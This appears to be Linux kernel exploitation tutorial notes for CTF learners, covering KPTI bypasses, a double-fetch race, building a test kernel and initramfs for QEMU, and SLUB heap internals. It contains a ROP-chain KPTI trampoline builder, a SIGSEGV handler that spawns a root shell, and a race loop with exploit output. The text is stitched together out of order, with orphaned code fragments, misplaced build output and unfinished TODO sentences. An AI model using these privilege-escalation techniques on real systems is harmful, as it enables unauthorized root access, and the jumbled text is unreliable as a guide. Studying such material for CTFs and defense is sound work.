KPTI separates the page tables for user space and kernel space, creating two sets.
The first set, used by the kernel, includes a complete mapping of user space that the kernel can use for things like copy_to_user(). This page table has the NX bit set for userspace memory.
Compiling, Customising and booting the Kernel
Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.
This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.
Prerequisites
The user set maps the minimum amount of kernel virtual memory possible (e.g. exception handlers and code required for the user to transition to the kernel).
You can disable KPTI from the command line via the nopti argument. It is also automatically disabled if the CPU is not affected by Meltdown.
Consequences and Bypasses
When in the user context, the kernel is not fully mapped. This doesn't affect most of our exploits, since they are executed in kernel mode.
However, when in kernel mode, userspace is mapped as non-executable. This means that we can't return to an escalate() function we defined via iretq. The solution to this is to swap page tables back to user ones.
To achieve this, we can abuse a function that is descriptively called swapgs_restore_regs_and_return_to_usermode. Disassembling it (TODO!), we see that it starts with a load of pop instructions, followed by a few mov and push instructions, then a page table switch, a swapgs and an iretq. We can jump to just after the pop instructions to avoid having to fill those in. This is commonly called a KPTI Trampoline.
TODO example
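Until a full example is written, here is a rough sketch of how the tail of a ROP chain using the trampoline is often laid out. Everything here is an assumption to verify against your target kernel: the entry address (symbol plus an offset past the pops) must come from your own disassembly, and the two filler slots reflect the layout commonly seen where the trampoline pops two registers before swapgs and iretq. IretFrame and build_kpti_return are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>

/* The five values iretq consumes, saved from userland beforehand. */
typedef struct {
    uint64_t rip;     /* where to resume in userland, e.g. a shell function */
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
} IretFrame;

/* Write the return-to-user part of the chain and report how many slots
 * were used. `trampoline` is the address just after the pop instructions
 * in swapgs_restore_regs_and_return_to_usermode (kernel-specific). */
size_t build_kpti_return(uint64_t *chain, uint64_t trampoline,
                         const IretFrame *frame) {
    size_t i = 0;

    chain[i++] = trampoline;
    chain[i++] = 0;               /* filler, assumed popped by the trampoline */
    chain[i++] = 0;               /* filler, assumed popped by the trampoline */
    chain[i++] = frame->rip;
    chain[i++] = frame->cs;
    chain[i++] = frame->rflags;
    chain[i++] = frame->rsp;
    chain[i++] = frame->ss;
    return i;
}
```

If the disassembly of your kernel shows a different number of pops between the page table switch and the iretq, adjust the filler slots to match.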
Bypassing KPTI via a SIGSEGV Handler
Trying to return to user mode via iretq without switching page tables results in a SIGSEGV rather than a kernel crash, because we are in userspace.
An alternative method is therefore to use a SIGSEGV handler - the exploit gets root privileges, then tries to access userland and triggers a SIGSEGV. The kernel fault handler will switch the page tables for us when dispatching to the handler! A good example can be found here.
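The userland half of this trick is small. The sketch below (with hypothetical names segv_shell and install_segv_shell) registers a handler before triggering the kernel bug; if the process has become root by the time the fault is delivered, the handler replaces it with a shell. It assumes /bin/sh exists in the target filesystem.

```c
#include <signal.h>
#include <unistd.h>

/* Runs in userland after the kernel has delivered the SIGSEGV, i.e. after
 * it has already switched back to the user page tables for us. */
static void segv_shell(int sig) {
    (void)sig;
    if (getuid() == 0)
        execl("/bin/sh", "sh", (char *)NULL);  /* we are root: take the shell */
    _exit(1);                                  /* privilege escalation failed */
}

/* Register the handler; call this BEFORE triggering the kernel exploit.
 * Returns 0 on success, -1 on failure. */
int install_segv_shell(void) {
    return signal(SIGSEGV, segv_shell) == SIG_ERR ? -1 : 0;
}
```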
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
printk("[Double-Fetch] Attempting login...");
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
// don't want to make the loop infinite, just in case
for (int i = 0; i < 1000000; i++) {
// now we write the cred struct to the module
res_id = write(fd, &creds, 0);
// if res_id is 0, stop the race
if (!res_id) {
puts("[+] ID is 0!");
break;
}
}
~ $ ./exploit
FD: 3
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[+] ID is 0!
[-] Finished race
; note that rbx is the buf argument, user-controlled
cmp dword ptr [rbx], 5
ja default_case
mov eax, [rbx]
mov rax, jump_table[rax*8]
jmp rax
There may be other requirements, I just already had them. Check here for the full list.
The Kernel
Cloning
Use --depth 1 to only get the last commit.
Customise
Remove the current compilation configurations, as they are quite complex for our needs
Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.
We create a kconfig file with the options we want to enable. An example is the following:
Explanation of Options
CONFIG_64BIT - compiles the kernel for 64-bit
CONFIG_SMP - symmetric multiprocessing; allows the kernel to run on multiple cores
CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps
CONFIG_PCI - enables support for the PCI bus
CONFIG_BLK_DEV_INITRD - enables support for loading an initial RAM disk
CONFIG_RD_GZIP - enables support for gzip-compressed initrd images
CONFIG_BINFMT_ELF - enables support for executing ELF binaries
CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line
CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs
CONFIG_INPUT - enables support for the generic input layer required for input device handling
CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework
CONFIG_INPUT_KEYBOARD - enables support for keyboards
CONFIG_MODULES - enables support for loading and unloading kernel modules
CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO
CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to
CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - TODO
CONFIG_EMBEDDED - disables optimizations/features for embedded systems
CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem
CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses
CONFIG_RANDOMIZE_BASE - enables KASLR support
CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space
In order to update the minimal .config with these options, we use the provided merge_config.sh script:
Building
That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.
We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.
To do this, we use busybox, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.
We will download and extract busybox; you can find the latest version here.
We also create an output folder for compiled versions.
Now compile it statically. We're going to use the menuconfig option, so we can make some choices.
Once the menu loads, hit Enter on Settings. Hit the down arrow key until you reach the option Build static binary (no shared libs). Hit Space to select it, and then Escape twice to leave. Make sure you choose to save the configuration.
Now, make it with the new options
Now we make the file system.
The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:
Make it executable
Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.
The -not -name *.cpio is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises
If we want to extract the cpio archive (say, during a CTF) we can use this command:
Loading it with QEMU
Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:
Explanation of Flags
-kernel bzImage - sets the kernel to be our compiled bzImage
-initrd initramfs.cpio - provide the file system
-append ... - basic features; in the future, this flag is also used to set protections
console=ttyS0 - Directs kernel messages to the first serial port (ttyS0)
quiet - suppresses most kernel boot messages
-monitor /dev/null - Disable the QEMU monitor
-nographic - Disable GUI, operate in headless mode (faster)
-no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).
Once we make this executable and run it, we get loaded into a VM!
User Accounts
Right now, we have a minimal Linux kernel we can boot, but if we try to work out who we are, it doesn't act quite as we expect it to:
This is because /etc/passwd and /etc/group don't exist, so we can just create those!
Loading the Kernel Module
The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.
First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).
Here I am assuming that the major number of the double_fetch module is 253.
Why am I doing that?
If we load into a shell and run cat /proc/devices, we can see that double_fetch is loaded with major number 253 every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
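One possible way to avoid hard-coding the number is to read it back from /proc/devices after the module has been loaded. The sketch below is a hypothetical helper (find_major is not part of the original setup) that scans text in the /proc/devices format, where each entry is a major number followed by a device name, and returns the first major whose name matches.

```c
#include <stdio.h>
#include <string.h>

/* Scan /proc/devices-style text for `name`.
 * Returns the major number of the first match, or -1 if it is not listed. */
int find_major(const char *devices_text, const char *name) {
    const char *line = devices_text;

    while (line && *line) {
        int major;
        char dev[64];

        /* Header lines such as "Character devices:" fail the %d and are skipped. */
        if (sscanf(line, "%d %63s", &major, dev) == 2 && strcmp(dev, name) == 0)
            return major;

        line = strchr(line, '\n');   /* advance to the next line, if any */
        if (line)
            line++;
    }
    return -1;
}
```

A small static helper binary in the initramfs could read /proc/devices into a buffer, call this, and create the device node with the result, instead of assuming 253.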
Compiling a Different Kernel Version
If we want to compile a kernel version that is not the latest, we'll dump all the tags:
It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:
We then continue from there.
Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.
Kernel Heap
The pain of it all
Historically, the Linux kernel has had three main heap allocators: SLOB, SLAB and SLUB.
SLUB is the latest version, having replaced SLAB as the default allocator. SLOB was used as the backup to SLAB and SLUB, but was removed in 6.4. As a result, SLUB is all we really have to care about (even pre-6.4, SLOB was practically never used). From here on out, we will only talk about SLUB, unless explicitly stated.
Note that, confusingly, "chunks" in the kernel heap are called objects and they are stored in slabs.
$ make allnoconfig
YACC scripts/kconfig/parser.tab.[ch]
HOSTCC scripts/kconfig/lexer.lex.o
HOSTCC scripts/kconfig/menu.o
HOSTCC scripts/kconfig/parser.tab.o
HOSTCC scripts/kconfig/preprocess.o
HOSTCC scripts/kconfig/symbol.o
HOSTCC scripts/kconfig/util.o
HOSTLD scripts/kconfig/conf
#
# configuration written to .config
#
CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y
CONFIG_PCI=y
# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y
# This is for /dev file system.
CONFIG_DEVTMPFS=y
# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y
CONFIG_MODULES=y
CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y
CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_USERFAULTFD=y
Unlike the glibc heap, SLUB has fixed sizes for objects, which are powers of 2 up to 8192 along with 96 and 192. These are conveniently called kmalloc-8, kmalloc-16, kmalloc-32, kmalloc-64, kmalloc-96, kmalloc-128, kmalloc-192, kmalloc-256, kmalloc-512, kmalloc-1k, kmalloc-2k, kmalloc-4k and kmalloc-8k. We call these individual classifications caches, and they are comprised of slabs.
Each slab is assigned its own area of memory and is comprised of one or more contiguous pages. If the kernel wants to allocate space in the heap, it will call kmalloc and pass it the size (and some flags). The size will be rounded up to fit in the smallest possible cache, then assigned there. Anything larger than 8192 bytes will not be served from these caches at all, and uses page_alloc instead.
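The rounding rule can be sketched as a simple lookup over the cache sizes listed above. This is an illustration of the behaviour described here, not the kernel's actual implementation, and kmalloc_cache_size is a hypothetical name.

```c
#include <stddef.h>

/* Return the object size of the smallest general-purpose cache that fits
 * `size` bytes, or 0 if the request is too large for any of them. */
size_t kmalloc_cache_size(size_t size) {
    static const size_t caches[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    for (size_t i = 0; i < sizeof(caches) / sizeof(caches[0]); i++) {
        if (size <= caches[i])
            return caches[i];
    }
    return 0;   /* larger than 8192: handled by the page allocator instead */
}
```

For example, a 100-byte request lands in kmalloc-128, while a 65-byte request lands in kmalloc-96 rather than kmalloc-128. When hunting for a victim struct to place next to an overflowable object, this is the calculation that tells you whether the two can share a cache.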
This approach is a massive performance improvement. It can also make exploitation primitives harder, as every object is the same size and it's harder to overlap. Similarly, because the sizes are determined by the cache rather than metadata, we cannot fake size.
Slab Creation
We can get to a point where we have so many objects in a cache that they fill all of the slabs. In this case, a new slab is created. This slab does not hold just the single requested object - it is filled with multiple objects. Why? Because the kernel knows that this slab is only used for kmalloc-1k objects, it creates all possible objects immediately and marks the remaining ones as free.
These remaining three are saved in the freelist in a random order, provided that the configuration CONFIG_SLAB_FREELIST_RANDOM is enabled (which it is by default).
The default size of slabs depends on the cache it is being used for. You can read /proc/slabinfo to see the current configuration for the system:
Here objsize is the size of each element in the cache, and objsperslab is the number of objects created at once when a new slab is initialized. Then pagesperslab is the product of objsize/0x1000 (pages per object) and objsperslab, and tells you how many pages each slab has.
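As a quick sanity check on that relationship, the arithmetic can be written out as below. This is a sketch assuming 4 KiB pages; pages_per_slab is a hypothetical helper, and it rounds up to whole pages, which the formula above leaves implicit for objects smaller than a page.

```c
#include <stddef.h>

#define SLAB_PAGE_SIZE 0x1000   /* assuming 4 KiB pages */

/* Pages needed to hold `objsperslab` objects of `objsize` bytes each,
 * rounded up to a whole number of pages. */
size_t pages_per_slab(size_t objsize, size_t objsperslab) {
    return (objsize * objsperslab + SLAB_PAGE_SIZE - 1) / SLAB_PAGE_SIZE;
}
```

With four kmalloc-1k objects per slab, as in the example above, this gives 1024 * 4 / 0x1000 = 1 page.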
TODO CONFIG_SLAB_FREELIST_HARDENED.
The Kernel Heap is Global
One major difference between user- and kernel-mode heap exploitation is that the kernel heap is shared between all kernel processes. Kernel modules and every other aspect of the kernel use the same heap.
So, let's say you find some sort of kernel heap primitive - an overflow, for example. Overflowing into identical objects might not be helpful, but in the kernel, we can find common structs with powerful primitives that we can use to our advantage. Imagine that there is a struct that contains a function pointer, and you can trigger a call to this function. If this struct is allocated to the same cache as the object you can overflow, it is possible to allocate this struct such that it inhabits the object located directly behind in memory. Suddenly the overflow is incredibly powerful, and can lead immediately to something like a ret2usr.